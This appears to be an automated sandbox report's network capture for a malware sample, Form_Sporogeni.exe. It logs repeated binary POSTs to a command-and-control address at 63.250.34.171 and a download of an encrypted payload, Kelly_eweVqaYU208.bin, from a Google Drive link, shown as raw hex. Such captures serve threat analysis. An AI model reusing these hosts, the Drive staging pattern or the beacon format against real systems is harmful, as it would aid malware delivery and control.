0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49762	63.250.34.171	80	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 07:09:43.464229107 CET	11589	OUT	POST /tickets.php?id=277 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.250.34.171 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: AA495C78 Content-Length: 190 Connection: close
Dec 2, 2021 07:09:44.496278048 CET	11594	IN	HTTP/1.1 403 Forbidden Date: Thu, 02 Dec 2021 06:09:43 GMT Server: Apache/2.4.38 (Debian) Content-Length: 287 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49773	63.250.34.171	80	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 07:09:46.686867952 CET	11615	OUT	POST /tickets.php?id=277 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.250.34.171 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: AA495C78 Content-Length: 163 Connection: close
Dec 2, 2021 07:09:47.621853113 CET	11625	IN	HTTP/1.1 403 Forbidden Date: Thu, 02 Dec 2021 06:09:46 GMT Server: Apache/2.4.38 (Debian) Content-Length: 287 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 36 33 2e 32 35 30 2e 33 34 2e 31 37 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49758	142.250.203.110	443	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-02 06:09:36 UTC	0	OUT	GET /uc?export=download&id=1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-12-02 06:09:37 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 02 Dec 2021 06:09:37 GMT Location: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} Content-Security-Policy: script-src 'nonce-zNdzbYaATOnXTCHcQn8Bgg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=g8ZSW_ariF5l--_bR3j2pwy0y_BSkEROcyMHGJua46KVxShtS-q6Zi-XNi1VCOw6dK6D2rIvr5CsUDAfEkfVYpXzKO5XPad-NKAncKhy_oJC-SlotflCBaTF1wo9cL52e1JO08OC8vy4y-ck-oDCxl7qk4ObKNWOLAJHZ_ajeKo; expires=Fri, 03-Jun-2022 06:09:36 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-02 06:09:37 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 30 2d 35 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 62 76 6d 6e Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn
2021-12-02 06:09:37 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49760	142.250.180.161	443	C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-02 06:09:37 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-00-50-docs.googleusercontent.com Connection: Keep-Alive
2021-12-02 06:09:37 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdvp6KqCaxet_IK-_Iazk9XpF7okXgWy6s9QwMRMidZ0g8EEypAQh29XHm6qKYpJwkofEe_VwZbu9zvBocIVjAiEP_txUA Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="Kelly_eweVqaYU208.bin";filename*=UTF-8''Kelly_eweVqaYU208.bin Content-Length: 106560 Date: Thu, 02 Dec 2021 06:09:37 GMT Expires: Thu, 02 Dec 2021 06:09:37 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=rA25Dg== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-02 06:09:37 UTC	6	IN	Data Raw: 5a a2 40 77 f1 6b 16 44 be 74 a7 ad 23 3a f8 dc ef 2a 61 ca 4f 34 b7 8b 09 05 0a 04 c9 ef ff 1a 52 17 96 0a f6 84 3c 1b 95 61 59 de 98 af 78 08 0d 80 31 fc 62 72 59 47 4d 8f 3d 34 3b ea 19 26 39 fb c0 76 d7 5e 61 33 0f 2e 35 89 a9 cd b3 5a c1 b5 cb 96 7d 33 6f 30 39 64 b7 95 cd 00 dd f4 19 e9 bb b8 d5 b1 9b 8f 62 8f 37 92 c6 42 0d bd de 38 7c be 1c 3e 13 60 fa b4 eb 13 6b 26 44 0f a8 0a 29 97 b3 e9 c2 50 b4 ed 6b 9d 34 35 aa 52 1f 10 06 9c 5b 32 c7 c9 6c 22 f7 b1 f9 73 2e e4 f8 ef 64 70 4f a1 20 49 42 05 f8 15 25 96 b6 06 23 40 8b bc f0 d5 92 8d 94 92 b3 2c ea 7a da ea 29 07 b9 bc 95 0d d3 d0 c9 34 82 76 33 9c 28 f0 fc ae 53 c5 84 54 2f 70 2c 67 67 de 86 51 ba bb 46 2a 1d c6 0f a1 74 8f e0 c7 d7 25 3b 00 7c 40 66 65 0a e2 0c 6b 80 70 be ec 8b cc f4 b6 4a Data Ascii: Z@wkDt#:aO4R<aYx1brYGM=4;&9v^a3.5Z}3o09db7B8\|>`k&D)Pk45R[2l"s.dpO IB%#@,z)4v3(ST/p,ggQFt%;\|@fekpJ
2021-12-02 06:09:37 UTC	9	IN	Data Raw: f8 87 32 c5 7a ad 12 93 68 38 bd 72 20 20 d5 33 f6 a7 66 fc 6e 07 dd 72 3d 47 94 1b 64 8e 4b 32 aa 27 42 86 ea 68 98 db 9a 33 14 15 82 9f 8e 60 9e c0 e7 e4 6c 0c d2 bc 9e 6d 67 71 b7 8b 11 06 bc 78 05 6d 9e 85 6b 41 10 21 73 7b 62 89 b1 1e 0c 73 c5 0a 07 17 fc 39 06 68 c6 bb 04 fa 12 f2 41 b9 41 80 64 2a 3e cc d9 08 e8 67 0f 8e f0 a5 e6 b4 da a3 80 52 a7 d7 da d9 11 44 32 1f ef b6 e9 60 d3 cb 13 ba 07 63 ab ea b9 a2 53 29 b8 6e 72 55 82 97 26 53 92 8f 3f 2e d1 1b 41 9f 3d af e3 b4 77 91 16 22 b3 a9 54 1a 24 e4 f0 ba 43 0f 14 df 58 72 ee 3f c4 d0 76 ae 4b 47 0f 79 1b 54 51 f6 93 c8 02 6a 79 0c c3 3d 53 69 ad fd a0 93 76 46 d2 be 7f 9d 81 c4 7a 1f a9 a5 84 73 39 63 6a 4a 19 54 74 26 f5 c1 7b 36 e0 0e 72 fe 8c 7d 12 5f 8d ad 61 23 61 02 eb c5 8e 55 3e f3 76 Data Ascii: 2zh8r 3fnr=GdK2'Bh3`lmgqxmkA!s{bs9hAAd*>gRD2`cS)nrU&S?.A=w"T$CXr?vKGyTQjy=SivFzs9cjJTt&{6r}_a#aU>v
2021-12-02 06:09:37 UTC	13	IN	Data Raw: 6d 39 0d 6d d9 6c 04 13 f2 c4 eb 38 11 18 ae f0 32 ba 9b e4 ec 10 63 a8 ef 62 23 da 4e f2 87 32 68 11 3a b1 2b 02 35 39 63 1b 25 2b 4e 5c a7 6c cd 11 32 ad 5e 6d 76 d1 5e 61 b0 d2 d1 08 09 56 32 b3 d9 a8 b5 f6 16 7d 33 6f b3 a8 64 e6 1e 81 24 e1 df 55 cd bf 81 1d e8 ec c2 4b 83 13 e0 8e 14 84 43 f7 fe 8f 1a 42 d7 cc 9d 05 4b 68 7f bf 22 45 7d 92 9f 95 df 82 94 0b 75 94 21 58 52 28 16 77 ff 27 e8 6a c8 15 76 ec 9f 09 76 1f 8b ef 0a 69 87 a8 bd 14 43 e6 2d 7c e1 91 c8 c8 8e 60 d9 e5 26 a7 8b 12 26 21 5b 5b 8f d1 11 7b d3 29 f9 1e e2 ce b6 e5 6e 94 dd e1 61 20 5b 58 bb 30 44 1a 79 f6 36 e2 40 b2 48 b3 9c 67 ed ec f6 fa f2 28 d6 cb 8a 04 e8 6e 0c e7 eb d2 71 97 88 b0 ac 9d 2b ed c9 1c 4f f4 d4 a4 db 79 83 f7 61 7d 1a 7d de 1e eb 6a 16 45 4e dc d3 19 dc 07 7a Data Ascii: m9ml82cb#N2h:+59c%+N\l2^mv^aV2}3od$UKCBKh"E}u!XR(w'jvviC-\|`&&![[{)na [X0Dy6@Hg(nq+Oya}}jENz
2021-12-02 06:09:37 UTC	17	IN	Data Raw: a1 39 23 7d 96 62 91 b7 10 26 fb 78 bc 9a 94 68 d9 1c d1 85 3c ff 5f 5a 18 30 13 27 d9 9c 07 56 0c 27 05 ec d5 80 e5 01 5a f0 ed 50 61 ac fa 3a a9 1f 8a ec 29 05 44 42 2e 90 99 4f 4d e8 88 9d 76 01 b2 71 e6 45 39 7d cd 3a 0f 6d 1b 3e 15 ac 27 b6 e1 a2 cd ea 5b 09 83 93 32 eb d5 e8 87 63 8b f0 a5 b8 a0 b9 97 5a b9 5b b9 a6 8a 76 46 97 e3 fd 48 79 ac 92 f4 16 47 d5 92 aa 5d f8 2a 74 77 3f 1f e9 82 d9 0d 2c 89 55 f6 2b 93 cc 4a df 88 cf 26 96 39 b8 b7 bb f1 f4 04 c3 65 00 6e 75 11 12 17 77 95 f7 36 ca ac 4e 0b b8 94 fa 47 1d 81 17 20 66 56 a6 1a eb b1 5e 30 de 97 f9 43 a5 61 df 0f e0 47 09 4f 4a 61 c9 3b 3a 6d ef bf 59 ff 2c 94 14 ca a5 3a 95 50 56 8d 6b bb 67 fe 70 fe da 10 19 16 71 fc 9e 85 fc 49 62 4d 0e 55 3e c8 05 96 4c ad 2c 15 28 13 8b de bf fa 88 f1 Data Ascii: 9#}b&xh<_Z0'V'ZPa:)DB.OMvqE9}:m>'[2cZ[vFHyG]*tw?,U+J&9enuw6NG fV^0CaGOJa;:mY,:PVkgpqIbMU>L,(
2021-12-02 06:09:37 UTC	18	IN	Data Raw: 49 84 9e d2 19 9b 65 f9 8b d4 40 21 bc 36 30 72 0b c6 a7 97 56 32 4c 2f 69 3c 8e 6a 2a 5b 33 61 38 64 5f 14 d3 00 dd 77 dd c9 32 fd d9 34 5b fb 52 df df dd c6 42 0d e4 5b f8 09 b7 e3 4b 1f 88 ad 4b 14 ec c2 d9 31 03 4e 82 7d 66 4c 04 20 8c c2 3d ea 80 b8 14 16 77 68 63 26 6f ed 4d 29 fe f1 18 3f af 76 e2 bf d2 d3 4a dd 60 68 85 bd 56 8c 93 69 6c ea 9c 19 78 15 a4 0a 84 1d 8d 14 6b ed 7b 08 d2 15 85 8f 61 09 35 b4 4a f5 fe 3b 82 be c1 17 23 44 44 37 f5 6d 0e c3 5b cd b8 64 1e 54 04 71 b0 59 76 40 4b 22 7a f9 94 79 58 e9 ce 5c 19 74 8a b0 ac 39 bb b9 a3 16 a7 bd ed 96 dd 66 0b d3 0b 53 44 65 40 cb 0c e6 36 40 d1 95 59 89 5d a5 dd 2a 56 99 a1 18 4c b5 c3 aa b1 db 3a 68 60 02 ea e6 93 25 99 7c cb 99 92 3b 59 47 d5 29 f0 94 3e 47 3b 7e bf 62 82 64 a8 ab ce 2d Data Ascii: Ie@!60rV2L/i<j[3a8d_w24[RB[KK1N}fL =whc&oM)?vJ`hVilxk{a5J;#DD7m[dTqYv@K"zyX\t9fSDe@6@Y]VL:h`%\|;YG)>G;~bd-
2021-12-02 06:09:37 UTC	19	IN	Data Raw: e8 7c 59 04 56 9f af 0f 46 b0 d2 03 f0 10 97 cc 35 af 88 94 08 8a 31 fd 08 39 0b a1 83 fc da 0a c1 a9 2b e4 3d 7a 14 0e 8b 91 a5 6a 65 ca 5d 6f 2b f6 64 46 46 fe e5 e8 6a bc e9 94 11 c1 d7 43 f2 21 8d f3 c5 01 98 e0 12 7a 23 67 47 6a 3a d1 ab 36 f5 40 a3 d0 1b aa 95 22 2b 4b 91 9e d4 74 1c a3 06 36 ae fc dc a0 48 50 32 c8 45 76 a5 06 c9 c4 e0 8e 03 3f 86 67 28 95 25 e4 04 4a 64 8f 61 53 e7 e1 e5 00 da 10 6b 2e 85 52 14 5d 11 85 3c 88 8a 03 c1 18 bd 23 eb 99 a7 9a 75 b8 2d f3 e3 24 22 a8 d3 bc 6c c7 86 2c f8 82 1e d0 c9 8c 1a d2 52 c7 3d 30 e3 fb 54 b4 30 43 fa 29 4a 2b a8 a6 ee 09 2c 9b 3a 61 c8 06 48 c2 a3 6b 4d 62 86 86 b0 ae 59 3e 5a 7f 19 d4 4b 77 04 9c 2c ec 56 af 89 6d a4 9c 79 2c 17 7e 2a 67 20 73 87 42 19 16 80 be 4a 7f 58 4a 52 a6 0c 35 a3 99 cc Data Ascii: \|YVF519+=zje]o+dFFjC!z#gGj:6@"+Kt6HP2Ev?g(%JdaSk.R]<#u-$"l,R=0T0C)J+,:aHkMbY>ZKw,Vmy,~*g sBJXJR5
2021-12-02 06:09:37 UTC	20	IN	Data Raw: c1 6c 7a 6e 63 d4 68 6d 8a b3 71 a6 0b 0b 26 21 5b 5b 8b 35 64 c7 2b bc 92 5d 15 1a 35 98 c9 da fe 9b 26 1c 5b c1 50 57 b3 43 55 7d 0e c0 35 e4 78 dd 22 98 99 ef 26 87 11 fd 45 40 d7 0c 3d d1 f2 51 ca 07 2b db 77 3b 54 3d 05 d8 2d e3 b0 0b 37 cf 84 ba ce 7c 13 2a 70 5c 4b 37 f4 81 da be 2e a6 4e 48 8b 32 06 2b 9e dc b5 3c 44 51 3c de ca 7a e0 29 82 88 91 64 99 73 71 1a 7c 0e 87 a4 6d 78 c3 3e ac 9c ab b8 e1 1b c6 7c 82 64 93 fd 59 62 52 3f 2b ff 7e b5 21 69 58 1a ea 10 6b 48 5d 89 79 da 65 47 e0 ab 32 6a 29 ce 6b 82 48 34 75 c5 c8 b5 7a b5 a8 34 a5 77 6a 9a ba e2 f4 d9 83 1a 12 1a fa fd 8c 9e e0 c0 d8 ae c2 4f bc f0 38 03 4c fa 25 3c 8b 4c c4 f4 01 76 21 4d 38 4a 65 8f 67 59 52 eb 3d a4 36 54 6d 45 57 9b 37 7d 2e a5 26 3a b6 0e 17 c9 b0 e9 58 99 cc 12 c8 Data Ascii: lznchmq&![[5d+]5&[PWCU}5x"&E@=Q+w;T=-7\|*p\K7.NH2+<DQ<z)dsq\|mx>\|dYbR?+~!iXkH]yeG2j)kH4uz4wjO8L%<Lv!M8JegYR=6TmEW7}.&:X
2021-12-02 06:09:37 UTC	22	IN	Data Raw: 61 c9 3b 3a fc fc 2b 80 fa 6d 47 29 94 25 83 98 df 68 8f 69 53 da eb e5 00 01 0b 68 0a df fa 36 aa 0c 85 92 bc 82 aa ee 4d 4e 96 b0 4c ea 94 21 2d 90 1e d0 e8 1d a1 b0 14 5d 11 c8 03 f5 a9 1d b4 da 22 23 87 24 7c 35 cd 96 f3 f8 8c 71 5f 50 5d 2d 50 b4 33 9d bd 09 db 96 27 3b 68 5b 3e 0b bc 5a ef 1f 42 bc 24 c4 29 98 d2 b1 cd 4b 77 5d a1 7b d4 5a 2e f5 53 bb 96 79 71 f2 81 d5 69 a9 9f 8b d7 c1 d0 94 be 4b d7 1e b0 fb 85 6c 42 c8 3c a0 98 c7 7b 46 94 ae 08 ed 7e 6e 1e e5 92 21 5e 5b d9 d7 7c 65 75 e9 2a 21 f5 f4 d7 3c 02 0f 1c 2f 3e 95 2f 57 9a e6 85 6b e4 88 58 d4 fa 8d d7 8b f7 63 21 37 39 9a 42 8c 3b 92 38 c6 30 7e 9e 8e 9c 44 50 e8 19 63 0b ef b4 c4 39 95 84 3a bc 38 f5 d5 93 e6 ec 10 d9 cd f9 e1 4f 77 17 0b 60 c8 32 ee c5 3a 59 4d f6 c6 be 61 59 59 84 Data Ascii: a;:+mG)%hiSh6MNL!-]"#$\|5q_P]-P3';h[>ZB$)Kw]{Z.SyqiKlB<{F~n!^[\|eu*!</>/WkXc!79B;80~DPc9:8Ow`2:YMaYY
2021-12-02 06:09:37 UTC	23	IN	Data Raw: 3c 86 dd 7a 41 e8 a8 7e 7f f7 47 7b 51 43 d0 67 a8 41 ca 59 e6 94 4a 1e 8b d6 33 f3 0f 84 d2 85 64 bc 09 b8 f1 90 94 fc ff 69 d0 ad 69 d2 4f 31 5e ea ec fc 81 58 a3 2f 57 97 c4 49 79 4c 92 6b 95 3f dc 4d 7f 6f 1e d4 13 16 0c b9 68 fa 88 72 45 d0 63 84 d0 15 aa 36 16 80 53 b9 9f 0f b0 b5 27 91 23 3b 60 4c 10 1a 93 50 fc 58 83 b2 44 7e 21 8a a0 9a 70 cf 7a 28 14 1b 40 61 f8 9a 45 0c 3d 32 6b a9 69 2a a3 6a 81 54 c4 43 1b ce e4 7e 6b 4a 26 90 8e b8 e5 4f 1d bf 06 77 43 e4 74 99 eb dd 2c 13 77 c5 de 4a 97 b3 dc ac 7a d5 6e e5 2e 9b dd c0 49 16 c9 ab 42 cf 98 7d 7a 52 c7 eb 92 c1 67 fb 09 14 d2 02 e7 5b 0d a7 31 25 75 05 ec b1 24 f2 d2 c9 2d 8e 56 52 5c 5c 9b 1f 2e 4a 22 3b 0c 51 36 33 34 5b b5 5e 46 77 a4 65 2a d4 b4 f1 71 5e 8f 08 bf 19 9a 57 b3 aa 06 e8 83 Data Ascii: <zA~G{QCgAYJ3diiO1^X/WIyLk?MohrEc6S'#;`LPXD~!pz(@aE=2kijTC~kJ&OwCt,wJzn.IB}zRg[1%u$-VR\\.J";Q634[^Fweq^W
2021-12-02 06:09:37 UTC	24	IN	Data Raw: 16 b4 08 7d c0 ea 22 af 8d c5 54 62 e5 6b 9c 03 3a 61 1b 17 e1 02 31 91 6c 9b 29 ab 16 a8 04 84 66 be e7 e8 63 50 b1 b0 f6 9f ba f5 a1 d5 b1 f7 e7 54 ca 57 54 68 a9 a4 99 cc b8 4e 1e de a3 0c 31 f8 18 b6 5b d3 68 cb 68 0c 0f 45 8f 0b bd a5 18 b1 22 d0 53 c2 39 2e de 6e 11 37 d2 41 11 44 25 ba 18 72 4f 62 44 99 85 7b b8 71 fa 4b f2 d1 3e 07 f6 98 a9 58 db 4f 1b 13 93 75 c9 a3 bc 8c ab c1 1f de 3b 99 19 6d e7 49 bb a7 c6 4e 6e 1f 00 01 9e d2 15 fe d1 5a 54 f7 3a 76 83 b6 0c e7 f4 d1 5f 85 be a6 67 a5 86 36 0f 86 f8 f3 1b d5 fa 04 bf 95 44 38 54 84 1d b6 e5 e5 16 e4 10 63 e9 ca 3b c1 90 c9 78 b5 89 b3 32 ba 1f ff 9e 5c f3 8f 13 64 9d ab fc fb a7 15 93 aa 7a d6 0c f7 91 0f 9d 33 f6 84 3f cd af 68 ee bd c1 11 74 44 f2 c4 0f 8b 1d c6 34 ad db a5 06 46 87 dd 81 Data Ascii: }"Tbk:a1l)fcPTWThN1[hhE"S9.n7AD%rObD{qK>XOu;mINnZT:v_g6D8Tc;x2\dz3?htD4F
